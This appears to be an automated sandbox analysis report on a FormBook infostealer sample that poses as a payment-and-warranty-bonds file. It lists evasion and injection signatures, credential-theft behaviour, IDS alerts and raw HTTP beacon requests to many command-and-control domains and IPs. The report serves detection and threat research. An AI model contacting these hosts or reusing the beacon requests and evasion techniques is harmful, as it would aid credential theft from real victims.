Windows Analysis Report
Payment&WarantyBonds.exe

Overview

General Information

Sample name: Payment&WarantyBonds.exe
(renamed file extension from bat to exe)
Original sample name: Payment&WarantyBonds.bat
Analysis ID: 1545186
MD5: a9da1b42f6ad80ee6085f69e6c25f49b
SHA1: e7f51c3eb496a278999fd893e1fcfca8a685f854
SHA256: 4e6fe41b2158546ebc7d5dcfe13aa832e3ce5025b36e0cfcc9d7f373e1a0a089
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Payment&WarantyBonds.exe ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Payment&WarantyBonds.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Payment&WarantyBonds.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Payment&WarantyBonds.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: sysinfo.pdb source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sysinfo.pdbGCTL source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oDnyHukDVUZk.exe, 00000006.00000002.4147995475.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4147962601.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Payment&WarantyBonds.exe, Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0056C500 FindFirstFileW,FindNextFileW,FindClose, 7_2_0056C500
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 4x nop then xor eax, eax 7_2_00559E20
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 4x nop then mov ebx, 00000004h 7_2_046504DE

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49794 -> 103.120.80.111:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49826 -> 103.120.80.111:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49840 -> 103.120.80.111:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49840 -> 103.120.80.111:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49890 -> 217.160.0.60:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49810 -> 103.120.80.111:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49876 -> 217.160.0.60:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49918 -> 217.160.0.60:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49969 -> 161.97.142.144:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49918 -> 217.160.0.60:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49954 -> 161.97.142.144:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 198.251.84.200:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 20.2.249.7:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 172.67.154.67:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 198.251.84.200:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 203.161.49.193:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 203.161.49.193:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 20.2.249.7:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 144.76.190.39:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 34.92.128.59:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50051 -> 144.76.190.39:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 144.76.190.39:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49985 -> 161.97.142.144:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 217.76.156.252:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 152.42.255.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 144.76.190.39:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50031 -> 172.67.154.67:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 34.92.128.59:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 217.76.156.252:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50059 -> 152.42.255.48:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50059 -> 152.42.255.48:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 172.67.154.67:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 217.76.156.252:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50047 -> 217.76.156.252:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 198.251.84.200:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 198.251.84.200:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 203.161.49.193:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 217.76.156.252:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 152.42.255.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49904 -> 217.160.0.60:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50043 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 198.251.84.200:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 20.2.249.7:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 34.92.128.59:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 172.67.154.67:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50035 -> 20.2.249.7:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 20.2.249.7:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 152.42.255.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 172.67.154.67:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50039 -> 203.161.49.193:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 203.161.49.193:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50000 -> 161.97.142.144:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50000 -> 161.97.142.144:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50055 -> 34.92.128.59:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 34.92.128.59:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 144.76.190.39:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.030002059.xyz
Source: DNS query: www.xipowerplay.xyz
Source: DNS query: www.091210.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View IP Address: 20.2.249.7 20.2.249.7
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /nhtq/?ZT=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.iampinky.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /3ej6/?ZT=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cotti.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /diem/?mTkD=Gj2Ti2T0g4&ZT=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.solarand.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /2sun/?ZT=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.030002059.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /akxn/?ZT=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.xipowerplay.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /wd23/?ZT=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.stationseek.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /jwed/?ZT=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.091210.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /wr26/?ZT=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.adsa6c.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /ep69/?ZT=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.simplek.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /xyex/?ZT=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.297676.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /dma3/?mTkD=Gj2Ti2T0g4&ZT=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cesach.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /3xn5/?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.basicreviews.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /33ib/?ZT=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.sgland06.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /jr4j/?ZT=/uHXlXwxCWKagG2f+cMqJk/ouEnshdx+b5P4XSvx6MlJZzR/8pbZgxPfuPQh+b7XVC9rmLmVxzweaBtr7+wSxihG8Hktp9qijzhrRRKR+f0leSIT4/3X8Bo=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.extrime1.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: www.iampinky.info
Source: global traffic DNS traffic detected: DNS query: www.cotti.club
Source: global traffic DNS traffic detected: DNS query: www.solarand.online
Source: global traffic DNS traffic detected: DNS query: www.030002059.xyz
Source: global traffic DNS traffic detected: DNS query: www.xipowerplay.xyz
Source: global traffic DNS traffic detected: DNS query: www.stationseek.online
Source: global traffic DNS traffic detected: DNS query: www.091210.xyz
Source: global traffic DNS traffic detected: DNS query: www.adsa6c.top
Source: global traffic DNS traffic detected: DNS query: www.simplek.top
Source: global traffic DNS traffic detected: DNS query: www.297676.com
Source: global traffic DNS traffic detected: DNS query: www.cesach.net
Source: global traffic DNS traffic detected: DNS query: www.basicreviews.online
Source: global traffic DNS traffic detected: DNS query: www.sgland06.online
Source: global traffic DNS traffic detected: DNS query: www.extrime1.shop
